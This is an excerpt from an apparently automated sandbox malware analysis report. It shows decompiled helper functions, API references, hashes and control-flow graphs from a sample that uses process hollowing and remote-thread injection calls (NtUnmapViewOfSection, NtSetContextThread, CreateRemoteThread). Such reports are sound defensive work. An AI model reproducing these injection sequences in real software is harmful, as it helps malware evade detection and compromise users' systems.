                              • Part of subcall function 04F82DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F6D463,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000), ref: 04F82DF1
                              • Part of subcall function 04F82DE3: StrChrA.SHLWAPI(?,0000003F,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?), ref: 04F82DFB
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?), ref: 04F6D493
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4AF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: b8e97563c5c90a10bc57b5cf6fc0950ea87b435109748456037ab2de5cce7abe
                            • Instruction ID: 43b5d6596157712597356f8f98f38a6a82cee25ed8b8d86fd3fae9957a72ebfb
                            • Opcode Fuzzy Hash: b8e97563c5c90a10bc57b5cf6fc0950ea87b435109748456037ab2de5cce7abe
                            • Instruction Fuzzy Hash: B8217272A04255BBDB12AF64CC84AAF7FA8DF06294B058055FC069F201EB75FD02D7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A145C4 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E04A145C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04A16D63(_t2);
				if(_t34 != 0) {
					_t30 = E04A16D63(_t28);
					if(_t30 == 0) {
						E04A16C2C(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04A17A57(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04A17A57(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                            0x04a145c4
                            0x04a145ce
                            0x04a145d0
                            0x04a145d6
                            0x04a145d6
                            0x04a145df
                            0x04a145e3
                            0x04a145ef
                            0x04a145f3
                            0x04a14667
                            0x04a145f5
                            0x04a145f5
                            0x04a145f9
                            0x04a145fe
                            0x04a14603
                            0x04a1461d
                            0x04a1460c
                            0x04a1460c
                            0x04a14610
                            0x04a14613
                            0x04a14618
                            0x04a14618
                            0x04a14622
                            0x04a1464a
                            0x04a14650
                            0x04a14653
                            0x04a14624
                            0x04a14626
                            0x04a1462e
                            0x04a14639
                            0x04a1463e
                            0x04a1463e
                            0x04a1465a
                            0x04a14661
                            0x04a14662
                            0x04a14662
                            0x04a145f3
                            0x04a14672

                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,?,761B4D40,?,?,04A16973,?,?,?,?,00000102,04A137A0,?,?,761F81D0), ref: 04A145D0
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                              • Part of subcall function 04A17A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04A145FE,00000000,00000001,00000001,?,?,04A16973,?,?,?,?,00000102), ref: 04A17A65
                              • Part of subcall function 04A17A57: StrChrA.SHLWAPI(?,0000003F,?,?,04A16973,?,?,?,?,00000102,04A137A0,?,?,761F81D0,00000000), ref: 04A17A6F
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A16973,?,?,?,?,00000102,04A137A0,?), ref: 04A1462E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04A1463E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04A1464A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: ccd2c088b5ec3d76f92e47113fef6355e43ac98f4ca068eb1dc2a165b73e0976
                            • Instruction ID: 86b1062ef2aefa179dbf7563a58ba0f27bca38a73f9c61d7bccd984970abf7d9
                            • Opcode Fuzzy Hash: ccd2c088b5ec3d76f92e47113fef6355e43ac98f4ca068eb1dc2a165b73e0976
                            • Instruction Fuzzy Hash: 3321E4B6500255FBDB12AF78C884EAB7FBCEF49788F054055F8059B221E735EA01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75189 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                            • Instruction ID: ef4dd1e6857af7fcac4669f9688db594bd69aa9f537ee9dfb9e4cd0e6fad5ddc
                            • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                            • Instruction Fuzzy Hash: 3D119E76901919BBDB209FA0EC84A66B778FF09304B05011AEA4992C10D776B9B3DBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A128C4 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A128C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04A16D63(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                            0x04a128d9
                            0x04a128dd
                            0x04a128e7
                            0x04a128ec
                            0x04a128f1
                            0x04a128f3
                            0x04a128fb
                            0x04a12900
                            0x04a1290e
                            0x04a12913
                            0x04a1291d

                            APIs
                            • lstrlenW.KERNEL32(004F0053,?,761B5520,00000008,055393F4,?,04A121EB,004F0053,055393F4,?,?,?,?,?,?,04A166BE), ref: 04A128D4
                            • lstrlenW.KERNEL32(04A121EB,?,04A121EB,004F0053,055393F4,?,?,?,?,?,?,04A166BE), ref: 04A128DB
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • memcpy.NTDLL(00000000,004F0053,761B69A0,?,?,04A121EB,004F0053,055393F4,?,?,?,?,?,?,04A166BE), ref: 04A128FB
                            • memcpy.NTDLL(761B69A0,04A121EB,00000002,00000000,004F0053,761B69A0,?,?,04A121EB,004F0053,055393F4), ref: 04A1290E
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID:
                            • API String ID: 2411391700-0
                            • Opcode ID: 21b454ea64dfb8820888d0b0b7be1fd9741b2c089f3322f9b03c527a21153719
                            • Instruction ID: 2f5a90166e3052b1770de71c3d71518f7f5e0287f58bfeb8e85a47aa3a27e30e
                            • Opcode Fuzzy Hash: 21b454ea64dfb8820888d0b0b7be1fd9741b2c089f3322f9b03c527a21153719
                            • Instruction Fuzzy Hash: 33F0F976900119BBAF11EFA9CC84CDF7BACEF092987154062ED04D7211EA75EB15DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F78193 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(69B25F44,?,?,00000000,04F75F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04F781A4
                            • lstrlen.KERNEL32(?,?,?,?), ref: 04F781A9
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 04F781C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F781E3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                            • String ID:
                            • API String ID: 1697500751-0
                            • Opcode ID: e9d806c0920707854dc0cb095144619eda020cea098ff6296173e4f09f13b5c1
                            • Instruction ID: b6d8f43a11f7af318391cbc20044496e3710fa49133290bb0432ea5c3b44b5a5
                            • Opcode Fuzzy Hash: e9d806c0920707854dc0cb095144619eda020cea098ff6296173e4f09f13b5c1
                            • Instruction Fuzzy Hash: 1DF0F6B7900751BBD721AA6A9C4CF1B7F9CFFC4391B094426E90587101E779E405CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F68DC7 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(06318560,761B5520,761F81D0,7749EEF0,04F6E873,?), ref: 04F68DD7
                            • lstrlen.KERNEL32(?), ref: 04F68DDF
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000,06318560), ref: 04F68DF3
                            • lstrcat.KERNEL32(00000000,?), ref: 04F68DFE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 086dc45b2d4a6d652e69c3bfb11d64b42c97bbcd8ceaf4dea5b58c10c2ffdf9f
                            • Instruction ID: ef85648cc84892c9000b94f3396833a409578ce1473a83fa951395fadf4b0d21
                            • Opcode Fuzzy Hash: 086dc45b2d4a6d652e69c3bfb11d64b42c97bbcd8ceaf4dea5b58c10c2ffdf9f
                            • Instruction Fuzzy Hash: B9E09273901225AB87119FE8BC4CCAFBBACEF99654304081AF600DB100C7299C018BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1393C Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(05539B68,00000000,00000000,00000000,04A15902,00000000), ref: 04A1394C
                            • lstrlen.KERNEL32(?), ref: 04A13954
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • lstrcpy.KERNEL32(00000000,05539B68), ref: 04A13968
                            • lstrcat.KERNEL32(00000000,?), ref: 04A13973
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 9bb669b9d61aa9fc99a2cf1c513b4270f984423d2a3e55e6a85fe6dada569ebb
                            • Instruction ID: 461c3b6ad6396baf22d046bfd7267e12898554ddeda1f7390820a14808c2385c
                            • Opcode Fuzzy Hash: 9bb669b9d61aa9fc99a2cf1c513b4270f984423d2a3e55e6a85fe6dada569ebb
                            • Instruction Fuzzy Hash: D5E0D8779016206B97119FF4AC4CC9FBBBCEF997617050416FA40D3120C7299D02CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 000002B636410FB9 Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000018.00000003.355421404.000002B636410000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B636410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_24_3_2b636410000_mshta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 272eba2218f925e95bd574ba5da1c1936239a68be2d0dd5740ed0d5ce09e05dc
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: F390020589940655D55416920C4E25C61816388A90FD484C0D42690145D98D02A61256
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000002B636410FC1 Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000018.00000003.355421404.000002B636410000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B636410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_24_3_2b636410000_mshta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 272eba2218f925e95bd574ba5da1c1936239a68be2d0dd5740ed0d5ce09e05dc
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: F390020589940655D55416920C4E25C61816388A90FD484C0D42690145D98D02A61256
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00DA9660 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 648COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 da9660-da96bc 1 da96be-da96d1 0->1 2 da96d3-da96db 0->2 3 da96e0-da96e8 1->3 2->3 4 da96ea-da96ed 3->4 5 da96f2-da96fa 3->5 6 da9cfe-da9d1a 4->6 7 da973f-da9749 5->7 8 da96fc-da9719 5->8 9 da9c7e 7->9 10 da974f-da975f 7->10 16 da971b-da971e 8->16 17 da9723-da973d call dc60dc 8->17 12 da9c83-da9c86 9->12 10->9 13 da9765-da9771 10->13 18 da9c88-da9c92 NtUnmapViewOfSection 12->18 19 da9c97-da9c9a 12->19 14 da9777-da977f 13->14 15 da99a4-da99a8 13->15 20 da99ae-da99b3 14->20 21 da9785-da97c0 call db583c 14->21 15->20 15->21 22 da9cd5-da9cdd 16->22 17->7 18->19 24 da9c9c-da9ca7 19->24 25 da9cd0-da9cd1 19->25 20->22 35 da97c6-da97fc call db41d8 21->35 36 da9c77-da9c7c 21->36 22->6 29 da9cdf-da9cf6 call dae53c 22->29 26 da9ca9-da9cab 24->26 27 da9cb2-da9cb9 NtClose 24->27 25->22 26->27 31 da9cad-da9cb0 26->31 34 da9cbe-da9cc8 27->34 29->6 31->25 34->25 35->12 40 da9802-da9816 call dc6c4c 35->40 36->12 40->12 43 da981c-da981f 40->43 44 da9830-da9835 43->44 45 da9821-da982b call dab7b8 43->45 47 da9862-da9888 call dab7b8 44->47 48 da9837-da983f 44->48 45->44 53 da988a-da9898 47->53 54 da989b-da989f 47->54 48->47 50 da9841-da9842 48->50 51 da9845-da9860 50->51 51->47 51->51 53->54 55 da98b8-da98c5 54->55 56 da98a1-da98b5 54->56 57 da98cb-da98f5 55->57 58 da99b8-da99bf 55->58 56->55 59 da990d-da9930 call dc5684 57->59 60 da98f7-da98fe 57->60 61 da99c1-da99c8 58->61 62 da99d7-da99fc 58->62 71 da9a88-da9a8a 59->71 72 da9936-da995d call dc5684 59->72 60->59 63 da9900-da9907 60->63 61->62 64 da99ca-da99d1 61->64 62->71 73 da9a02-da9a26 call da25c0 62->73 63->59 66 da9992-da999f 63->66 64->62 67 da9a76-da9a7a 64->67 70 da9a80-da9a83 call dab7b8 66->70 67->70 70->71 71->12 75 da9a90-da9ad4 call dab7b8 71->75 72->71 81 da9963-da998a call dc5684 72->81 73->71 82 da9a28-da9a4c call da25c0 73->82 89 da9ada-da9b1f call dae53c * 2 75->89 90 da9c5c-da9c5e 75->90 81->71 91 da9990 81->91 82->71 92 da9a4e-da9a72 call da25c0 82->92 102 da9c2b-da9c32 89->102 103 da9b25-da9b52 call dc04cc 89->103 90->12 95 da9c60-da9c6b 90->95 91->66 92->71 100 da9a74 92->100 95->12 98 da9c6d-da9c75 95->98 98->12 100->67 109 da9c3b 102->109 110 da9c34-da9c39 102->110 107 da9b58-da9b65 103->107 108 da9c42-da9c48 103->108 112 da9b7d-da9b7f 107->112 113 da9b67-da9b7b 107->113 114 da9c4a-da9c54 108->114 111 da9c3d-da9c40 109->111 110->114 111->108 111->114 112->111 115 da9b85-da9bda call dab7b8 112->115 113->112 114->90 120 da9bdc-da9be1 115->120 121 da9be4-da9c02 call da6d24 115->121 120->121 121->114 125 da9c04-da9c11 121->125 125->111 126 da9c13-da9c1f NtSetContextThread 125->126 127 da9c27-da9c29 126->127 127->111
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                            • Instruction ID: e70b741db038b68bd0654b90e51795f8c68a0cd2343dbae58672f161bf5c662b
                            • Opcode Fuzzy Hash: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                            • Instruction Fuzzy Hash: AA12A430618F498FDB68EF2CD895A66B3E1FB99311F54462EE44AC3251EF34E841CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA65E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 128 da65e4-da6653 call dae53c 132 da6659-da6674 128->132 133 da672c-da6735 128->133 135 da667a-da66bb NtQueryInformationToken 132->135 136 da671e-da671f 132->136 138 da66bd-da66e8 NtQueryInformationToken 135->138 139 da6710-da6718 NtClose 135->139 136->133 140 da66ea-da66f9 call dab7b8 138->140 141 da66fe-da6708 138->141 139->136 140->141 141->139
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: InformationQueryToken$Close
                            • String ID: 0
                            • API String ID: 459398573-4108050209
                            • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                            • Instruction ID: 7e9b14009272692dfb89fac6462ff374c2c8d3210d6d2265216c8f5c812a6ab6
                            • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                            • Instruction Fuzzy Hash: 2F313730218B488FD764EF28D884B9AB7E1FB99301F50492EE48AC3250DB349945CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DAAA6C Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 188 daaa6c-daaaa4 189 daaac8-daaad4 call da495c 188->189 190 daaaa6-daaab9 188->190 195 daaada-daaaea 189->195 196 daac25 189->196 190->189 194 daaabb-daaac3 190->194 200 daac3a-daac54 194->200 197 daab3f-daab5c 195->197 198 daaaec-daab1c NtSetInformationProcess 195->198 199 daac2a-daac2d 196->199 209 daab5e-daab60 197->209 203 daab1e-daab2e call dc6e10 198->203 204 daab30-daab38 198->204 199->200 201 daac2f-daac30 199->201 201->200 210 daab3a-daab3d 203->210 204->210 209->199 211 daab66-daab85 209->211 210->197 210->209 213 daab8b-daab8e 211->213 214 daac1e-daac23 211->214 213->214 215 daab94-daabc4 CreateRemoteThread 213->215 214->199 216 daabc6-daabcd 215->216 217 daac14-daac1c 215->217 218 daabd9-daabf5 call daeca8 216->218 219 daabcf-daabd4 call dc71e8 216->219 217->199 224 daac01 ResumeThread 218->224 225 daabf7-daabff 218->225 219->218 226 daac07-daac12 FindCloseChangeNotification 224->226 225->226 226->199
                            APIs
                            • NtSetInformationProcess.NTDLL ref: 00DAAB14
                            • CreateRemoteThread.KERNELBASE ref: 00DAABBA
                            • FindCloseChangeNotification.KERNELBASE ref: 00DAAC0C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
                            • String ID:
                            • API String ID: 1964589409-0
                            • Opcode ID: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                            • Instruction ID: 2b1f993e91fb6c97cb1a3e3dd4a3ed8215be99e0922edc38566d9a9ff5d1fe01
                            • Opcode Fuzzy Hash: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                            • Instruction Fuzzy Hash: E051B030618F098FE764EF6CD88962677E1FB99311F14462DE94AC3261EB34DC45CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DAEEF8 Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 321 daeef8-daef77 324 daef79-daefab call dae53c 321->324 325 daefad-daefae 321->325 327 daefb0-daefb3 324->327 325->327 329 daefb9-daefe2 CreateMutexExA 327->329 330 dafb22-dafb3e 327->330 333 daf000-daf003 329->333 334 daefe4-daefe9 329->334 335 daf009-daf030 333->335 336 dafb1f-dafb20 333->336 337 daefeb-daeff8 334->337 338 daeffd-daeffe 334->338 341 daf036-daf082 335->341 342 daf0f7-daf0f8 335->342 336->330 337->336 338->333 356 daf099-daf0a9 341->356 357 daf084-daf08b 341->357 343 daf0fa-daf0fd 342->343 343->330 345 daf103-daf144 343->345 348 daf14a-daf150 345->348 349 daf1e8-daf1e9 345->349 352 daf1be-daf1e6 call db3bc8 348->352 353 daf152-daf160 348->353 350 daf1eb-daf1ee 349->350 350->330 355 daf1f4-daf20f GetUserNameA 350->355 352->350 358 daf162-daf1aa 353->358 361 daf240-daf252 355->361 362 daf211-daf22d 355->362 360 daf0af-daf0d8 356->360 357->356 363 daf08d-daf093 call dcb2cc 357->363 364 daf1ac-daf1b0 358->364 365 daf1b6-daf1bc 358->365 374 daf0da-daf0f5 360->374 367 daf25b-daf2a4 361->367 368 daf254-daf259 361->368 362->361 375 daf22f-daf238 362->375 363->356 364->365 365->352 365->358 383 daf2a6-daf2af 367->383 384 daf2b7-daf2b8 367->384 368->367 372 daf2c6-daf2cb 368->372 376 daf30d-daf310 372->376 377 daf2cd-daf2ee 372->377 374->343 375->361 378 daf312-daf322 call dab7b8 376->378 379 daf327-daf35e 376->379 389 daf302-daf30a 377->389 390 daf2f0-daf2f7 377->390 378->379 386 daf360-daf380 379->386 387 daf3c1 379->387 396 daf3e4-daf3f0 383->396 397 daf2b5 383->397 393 daf2c0 384->393 403 daf386-daf3a4 call daccc8 386->403 391 daf3c6-daf3c9 387->391 389->376 390->389 394 daf2f9-daf300 390->394 391->330 395 daf3cf-daf3d2 391->395 393->372 394->376 399 daf3db-daf3de 395->399 400 daf3d4 call dbb4b0 395->400 401 daf46a-daf47c call dc9604 396->401 402 daf3f2-daf423 call dcba3c 396->402 397->393 399->330 399->396 409 daf3d9 400->409 412 daf47e-daf4af call dcba3c 401->412 413 daf4b6-daf4c8 call dc98a8 401->413 402->401 414 daf425-daf42d 402->414 415 daf3b3 403->415 416 daf3a6-daf3af 403->416 409->399 425 daf4d0-daf517 call dbd43c call dbac88 412->425 426 daf4b1-daf4b2 412->426 413->425 414->401 421 daf42f-daf464 call dbef6c 414->421 418 daf3b8-daf3bf 415->418 416->403 417 daf3b1 416->417 417->418 418->391 421->401 433 daf519-daf538 425->433 434 daf540-daf543 call dcb4d0 425->434 426->413 433->434 437 daf548-daf54d 434->437 437->330 438 daf553-daf56c 437->438 438->330 440 daf572-daf59a 438->440 442 daf59c-daf5b1 440->442 443 daf5c0-daf5ea call dc26bc 440->443 442->443 447 daf5b3-daf5bb 442->447 448 daf5f9-daf608 443->448 449 daf5ec-daf5f4 443->449 447->330 450 daf60e-daf644 call db3bc8 448->450 451 daf8d1-daf8d8 448->451 449->330 468 daf651-daf654 450->468 469 daf646-daf64d 450->469 453 daf8de-daf902 call dc7004 451->453 454 dafa60-dafa69 451->454 464 daf908-daf928 call dc8678 453->464 465 daf9a5-daf9c6 call dc7004 453->465 454->336 456 dafa6f-dafa74 454->456 459 dafae6-dafb14 call dc26bc 456->459 460 dafa76-dafa79 456->460 459->449 476 dafb1a-dafb1c 459->476 466 dafa8b-dafaa8 460->466 467 dafa7b-dafa85 460->467 464->465 482 daf92a-daf937 464->482 465->454 481 daf9cc-daf9e9 call dc8678 465->481 466->459 480 dafaaa-dafadc 466->480 467->466 468->330 474 daf65a-daf727 call dc6b44 * 4 468->474 469->468 506 daf729-daf730 474->506 507 daf795-daf798 474->507 476->336 480->459 481->454 491 daf9eb-daf9f8 481->491 485 daf939-daf97e call dc0c58 call dc48d4 482->485 486 daf993-daf99d 482->486 485->486 505 daf980-daf98e call dbf5d8 485->505 486->465 492 daf9fa-dafa40 call dc0c58 call dc48d4 491->492 493 dafa4e-dafa58 491->493 492->493 515 dafa42-dafa49 call dbb24c 492->515 493->454 505->486 506->507 511 daf732-daf74d 506->511 507->330 510 daf79e-daf7a5 507->510 513 daf7bc-daf7db 510->513 514 daf7a7-daf7b6 510->514 517 daf74f-daf755 511->517 518 daf757-daf783 call dc26bc 511->518 521 daf81b-daf85b 513->521 522 daf7dd-daf816 call dafe20 513->522 514->513 515->493 527 daf793 517->527 518->507 529 daf785-daf78b 518->529 530 daf89e-daf8a4 521->530 531 daf85d-daf87a call dc26bc 521->531 522->521 527->507 529->527 536 daf8a6-daf8a9 530->536 537 daf87c-daf881 531->537 538 daf883-daf89c 531->538 536->330 539 daf8af-daf8ba 536->539 537->536 538->536 539->454 540 daf8c0-daf8cc call da6274 539->540 540->454
